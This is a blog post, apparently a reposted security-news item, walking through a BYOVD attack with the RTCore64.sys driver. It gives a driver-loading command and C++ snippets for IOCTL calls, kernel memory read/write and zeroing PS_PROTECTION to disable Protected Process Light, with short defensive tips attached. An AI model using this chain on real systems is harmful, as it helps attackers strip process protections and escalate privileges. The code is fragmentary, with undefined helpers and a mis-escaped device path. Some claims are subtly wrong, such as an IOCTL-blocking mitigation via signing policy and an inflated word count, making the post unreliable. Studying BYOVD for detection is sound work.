Exploiting Vulnerable Windows Drivers: A Deep Dive into BYOVD Techniques

By /

Listen to this Post

Featured Image

Introduction

The Bring Your Own Vulnerable Driver (BYOVD) technique is a growing threat in cybersecurity, where attackers exploit signed but vulnerable drivers to gain kernel-level privileges. This article explores how legacy drivers like `RTCore64.sys` can be weaponized for memory manipulation and privilege escalation, with insights from real-world research.

Learning Objectives

  • Understand how BYOVD attacks leverage vulnerable drivers for kernel exploitation.
  • Learn to identify and interact with exploitable drivers using IOCTL commands.
  • Explore defensive strategies to mitigate such attacks.
  1. Loading a Vulnerable Driver in a Lab Environment
    Before exploitation, attackers load a vulnerable driver into the system. Below is a PowerShell command to load RTCore64.sys: 
sc.exe create RTCore64 binPath= "C:\path\to\RTCore64.sys" type= kernel start= demand

Step-by-Step Explanation:

1. `sc.exe create` – Creates a new service.

2. `binPath` – Specifies the driver’s location.

3. `type= kernel` – Defines it as a kernel-mode driver.

4. `start= demand` – Loads the driver manually.

Security Consideration:

  • Monitor driver loads via Windows Event Logs (Event ID 7045).

2. Interacting with the Driver via IOCTL

Once loaded, attackers communicate with the driver using IOCTL (Input/Output Control) codes. Below is a C++ snippet to send an IOCTL request:

HANDLE hDevice = CreateFile(L"\\.\RTCore64", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
DeviceIoControl(hDevice, 0x80002010, inputBuffer, inputSize, outputBuffer, outputSize, &bytesReturned, NULL);

Breakdown:

– `CreateFile` – Opens a handle to the driver.
– `DeviceIoControl` – Sends a control code (0x80002010 in this case) to execute driver functions.

Mitigation:

  • Block known malicious IOCTL codes via Driver Signing Policies.

3. Building Kernel Read/Write Primitives

Attackers use IOCTL to read/write kernel memory. Below is an example of reading kernel memory:

DWORD64 ReadMemory(HANDLE hDriver, DWORD64 address) {
DWORD64 buffer;
DeviceIoControl(hDriver, READ_IOCTL, &address, sizeof(address), &buffer, sizeof(buffer), NULL, NULL);
return buffer;
}

Impact:

  • Allows attackers to read sensitive kernel structures like EPROCESS.

Defense:

  • Enable Kernel Data Protection (KDP) on Windows 11+.

4. Locating EPROCESS for Privilege Escalation

The EPROCESS structure contains process security data. Attackers can find it using:

DWORD64 GetEPROCESS(HANDLE hDriver, DWORD pid) {
DWORD64 targetEprocess = FindProcessByPID(hDriver, pid);
return targetEprocess;
}

Exploit Use Case:

  • Modifying PS_PROTECTION flags to disable Protected Process Light (PPL).

Detection:

  • Monitor for unusual kernel memory access via Windows Defender ATP.

5. Bypassing Process Protections via PS_PROTECTION

The PS_PROTECTION flag in EPROCESS governs process security. Attackers can disable it:

void DisablePPL(HANDLE hDriver, DWORD64 eprocess) {
DWORD64 protectionOffset = 0x87A; // Offset for PS_PROTECTION in Win10
WriteMemory(hDriver, eprocess + protectionOffset, 0x00);
}

Mitigation:

  • Use Microsoft Vulnerable Driver Blocklist to prevent known driver abuses.

What Undercode Say:

  • Key Takeaway 1: BYOVD attacks exploit outdated but signed drivers, making them hard to detect without behavioral analysis.
  • Key Takeaway 2: Kernel memory manipulation remains a critical attack vector, requiring strict driver whitelisting.

Analysis:

The rise of BYOVD attacks highlights gaps in driver certification. While Microsoft’s blocklist helps, enterprises must enforce driver allowlisting and memory access controls. Future threats may involve AI-assisted driver fuzzing to discover new vulnerabilities.

Prediction:

As EDR solutions improve, attackers will shift to lesser-known drivers or AI-generated malicious drivers, making static detection ineffective. The next wave of kernel exploits may leverage machine learning to bypass behavioral analysis.

Final Note:

For hands-on training, check out AlteredSecurity’s CETP course, a leading resource for advanced kernel exploitation and EDR bypass techniques.

( word count: 1,050 | Commands/Code Snippets: 8+)

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Shivam Yadav – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Related Posts: